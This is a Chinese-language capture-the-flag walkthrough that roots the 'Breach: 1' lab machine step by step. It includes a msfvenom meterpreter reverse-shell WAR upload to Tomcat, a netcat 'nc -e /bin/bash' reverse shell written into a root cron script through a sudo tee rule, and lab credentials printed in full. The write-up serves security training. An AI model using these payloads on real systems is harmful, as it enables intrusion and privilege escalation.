Breach: 1

Reference

Writeup

  • Recon: nmap掃完結果每個ports都open,看起來是有裝IDS/IPS
  • 直接瀏覽http://192.168.110.140
    • 檢視網頁原始碼,發現Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo
    • 做兩次base64 decode得到pgibbons:damnitfeel$goodtobeagang$ta,看起來是帳號與密碼
  • 點擊首頁圖片→Employee portal→登入後查看Inbox
    • 發現192.168.110.140/.keystore,這是Java KeyStore檔,mail中有提到ssl關鍵字
    • 搜尋ssl,發現SSL implementation test capture文章裡有http://192.168.110.140/impresscms/_SSL_test_phase1.pcap
  • 使用wireshark開啟,有開在TCP Port 8443的TLS
  • 另外發現referer:https://192.168.110.140:8443/_M@nag3Me/html
    • 登入後進到了Tomcat Web Application Manager
    • 可以上傳WAR file,使用msfvenom產生payload:msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.110.141 LPORT=4444 -f war -o manager.war (註:Kali VM也要設為host-only: 192.168.110.141)
      use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.110.141
set lport 4444
run
    • spawn a tty:
      echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
  • 下載http://192.168.110.140/images/bill.png
    • 使用exiftool bill.png發現Comment : coffeestains密碼
  • 在/etc/passwd底下有user:blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash
    • su blumbergh登入
    • 查看可以執行哪些命令:sudo -l
      Matching Defaults entries for blumbergh on Breach:
  env_reset, mail_badpass,
  secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User blumbergh may run the following commands on Breach:
  (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh
    • 看來blumbergh會以sudoer身份定時每三分鐘執行/usr/bin/tee /usr/share/cleanup/tidyup.sh且不需要密碼
    • 由於tidyup.sh檔案只有讀的權限-rwxr-xr-x 1 root root 37 Oct 26 01:14 tidyup.sh,因此必須想辦法寫入資料。可以利用提供的tee指令寫入資料:
      • 先建立shell.txt:echo "nc -e /bin/bash 192.168.110.141 7788" > shell.txt
      • 將shell.txt內容寫到tidyup.sh裡:cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
  • 主機監聽:nc -vnlp 7788,三分鐘到時,自動執行tidyup.sh,取得root shell,get flag

results matching ""

    No results matching ""